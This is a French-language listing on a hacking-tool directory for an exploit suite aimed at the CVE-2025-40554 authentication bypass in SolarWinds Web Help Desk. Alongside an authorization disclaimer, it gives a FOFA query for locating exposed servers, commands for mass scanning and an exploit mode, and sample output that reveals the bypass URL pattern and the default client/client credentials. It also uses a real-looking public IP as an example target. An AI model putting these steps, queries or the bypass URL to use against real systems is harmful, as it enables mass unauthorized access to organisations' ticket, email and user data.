Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-40554 — CVE-2025-40554 Exploitation | Kitploit
Outils/GitHubGitHub/skynoxk/cve-2025-40554
ReconnaissanceVulnerability AnalysisExploitationWeb Application ExploitationInformation GatheringPenetration TestingAuthentication
GitHubskynoxk/cve-2025-40554

CVE-2025-40554

CVE-2025-40554 Exploitation

Voir le dépôt
il y a 6 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-40554 Suite d'Exploitation

Un outil complet de test de sécurité pour détecter et exploiter la vulnérabilité de contournement d'authentification (CVE-2025-40554 / CVE-2025-40536) dans SolarWinds Web Help Desk.

⚠️ Avertissement

À DES FINS ÉDUCATIVES ET DE TEST DE SÉCURITÉ AUTORISÉ UNIQUEMENT

Cet outil est fourni pour la recherche en sécurité, les tests d'intrusion et l'évaluation de vulnérabilités sur des systèmes que vous possédez ou pour lesquels vous avez une autorisation écrite explicite. L'accès non autorisé à des systèmes informatiques est illégal. Les auteurs ne sont pas responsables de l'utilisation abusive ou des dommages causés par cet outil.

🔍 Aperçu de la vulnérabilité

CVE-2025-40554 est une vulnérabilité critique de contournement d'authentification dans SolarWinds Web Help Desk qui permet à des attaquants non authentifiés de :

  • Contourner les mécanismes d'authentification
  • Accéder aux fonctions administratives privilégiées (Authentification)
  • Énumérer la configuration du système

Versions concernées

  • SolarWinds Web Help Desk (les informations spécifiques sur la version doivent être vérifiées)
  • Consultez les avis de sécurité SolarWinds pour les versions corrigées

🚀 Fonctionnalités

Vérifiez par vous-même :)

Dépendances :

  • Python 3.6+
  • bibliothèque requests
  • bibliothèque urllib3

🛠️ Installation

root@kitploit:~
# Clonez ou téléchargez le script
wget https://raw.githubusercontent.com/username/repo/main/CVE-2025-40554.py

# Rendez-le exécutable
chmod +x CVE-2025-40554.py

📖 FOFA

root@kitploit:~
("Web Help Desk") && (icon_hash="1895809524" || icon_hash="804130677")

📖 Utilisation

Analyse de base (cible unique)

root@kitploit:~
# Vérification simple de la vulnérabilité
python3 CVE-2025-40554.py -t https://cible:8443

# Avec protocole explicite
python3 CVE-2025-40554.py -t https://203.106.221.203:8443

Mode exploitation complète

root@kitploit:~
# Exploitation complète avec énumération de session
python3 CVE-2025-40554.py -t https://cible:8443 --exploit

# Ignorer le test des identifiants par défaut
python3 CVE-2025-40554.py -t https://cible:8443 --exploit --no-login

Analyse en masse

root@kitploit:~
# Scanner plusieurs cibles à partir d'un fichier
python3 CVE-2025-40554.py -l cibles.txt

# Analyse en masse avec exploitation
python3 CVE-2025-40554.py -l cibles.txt --exploit

# Mode silencieux (sortie minimale)
python3 CVE-2025-40554.py -l cibles.txt -q

# Fichier de sortie personnalisé
python3 CVE-2025-40554.py -l cibles.txt -o resultats.txt

Format du fichier de cibles

cibles.txt :

root@kitploit:~
https://cible1:8443
https://cible2.exemple.com:8443
192.168.1.100:8443
cible3.local:8443
# Les commentaires sont pris en charge

🎯 Options de ligne de commande

📊 Exemples de sortie

Exploitation réussie

root@kitploit:~
╔═══════════════════════════════════════════════════════════════════╗
║     CVE-2025-40554 - SolarWinds Web Help Desk                    ║
║     Authentication Bypass Exploitation Tool                       ║
║     Research & Educational Purposes Only                          ║
╚═══════════════════════════════════════════════════════════════════╝

======================================================================
Cible : https://203.106.221.203:8443
======================================================================
[*] Étape 1 : Établissement de la session...
[+] WOSID extrait : AbCdEfGhIjKlMnOpQrStU
[+] Jeton XSRF : abc123-def456-ghi789

[*] Étape 2 : Test du contournement d'authentification...
[+] Indicateurs de contournement trouvés : externalAuthContainer, JSONRpcClient, SAML 2.0
[+] VULNÉRABLE - Contournement d'authentification confirmé !

[*] Étape 3 : Test des identifiants par défaut (client/client)...
[+] SUCCÈS - Les identifiants par défaut fonctionnent !

======================================================================
MODE EXPLOITATION - Contournement d'authentification CVE-2025-40554
======================================================================

[*] URL de contournement : https://203.106.221.203:8443/helpdesk/WebObjects/Helpdesk.woa/wo/bogus.wo/AbCdEfGhIjKlMnOpQrStU/1.0?badparam=/ajax/&wopage=LoginPref
[*] Déclenchement du contournement d'authentification...
[+] Contournement d'authentification réussi !

[*] Cookies de session :
  wosid = AbCdEfGhIjKlMnOpQrStU
  XSRF-TOKEN = abc123-def456-ghi789

======================================================================
RÉSUMÉ
======================================================================
[+] La cible est VULNÉRABLE à CVE-2025-40554
[+] Identifiants par défaut : FONCTIONNENT
======================================================================

Résultats de l'analyse en masse

root@kitploit:~
[*] 5 cibles uniques chargées depuis cibles.txt
[*] Mode : Contournement + test des identifiants par défaut
[*] Exploitation complète activée

[1/5] Test de https://cible1:8443
[+] VULNÉRABLE - Contournement d'authentification confirmé !
[+] SUCCÈS - Les identifiants par défaut fonctionnent !

[2/5] Test de https://cible2:8443
[!] NON VULNÉRABLE - Échec du contournement d'authentification

...

======================================================================
RÉSUMÉ DE L'ANALYSE
======================================================================
Total scanné :     5/5
Vulnérables :       2
Avec identifiants par défaut :   1
======================================================================

[+] Résultats enregistrés dans : vulnerable_targets.txt

🔧 Détails techniques

Flux d'exploitation

  1. Établissement de session

    • Se connecte à l'instance WHD
    • Extrait le WOSID (ID de session WebObjects) de plusieurs sources
    • Capture le jeton XSRF s'il est présent
  2. Contournement d'authentification

    • Construit une URL malveillante avec injection WOSID
    • Exploite le path traversal dans le routage WebObjects
    • Contourne les contrôles d'authentification
  3. Test des identifiants (optionnel)

    • Analyse le formulaire de connexion avec protection CSRF
    • Teste les identifiants par défaut (client/client)
    • Valide l'authentification réussie
  4. Exploitation complète (mode --exploit)

    • Exporte les cookies de session
    • accès email, tickets, base de données, utilisateurs, (supprimé)

Indicateurs de vulnérabilité

L'outil détecte un contournement réussi en vérifiant la présence de :

  • externalAuthContainer - Configuration d'authentification externe
  • JSONRpcClient - Exposition du client API
  • SAML 2.0 - Configuration SSO
  • LoginPref - Paramètres de préférence de connexion
  • authMode - Paramètres de mode d'authentification

🤝 Contribution

Les contributions sont les bienvenues.....

📚 Références

  • Détails de CVE-2025-40554
  • Détails de CVE-2025-40536
  • Avis de sécurité SolarWinds
  • Documentation du framework WebObjects

📄 Licence

Cet outil est fourni "en l'état" sans garantie d'aucune sorte. Utilisez-le à vos risques et périls.

👤 Auteur

Skynoxk


Rappel : Piratez toujours de manière éthique et légale. L'accès non autorisé est un crime.

Télécharger l’outil
OptionDescription
-t, --target URLURL cible unique à tester
-l, --list FILEFichier contenant la liste des cibles (une par ligne)
--exploitActiver le mode exploitation complète avec énumération
--no-loginIgnorer le test des identifiants par défaut
-o, --output FILEFichier de sortie pour les cibles vulnérables (par défaut : vulnerable_targets.txt)
-q, --quietMode sortie minimale (utile pour les analyses en masse)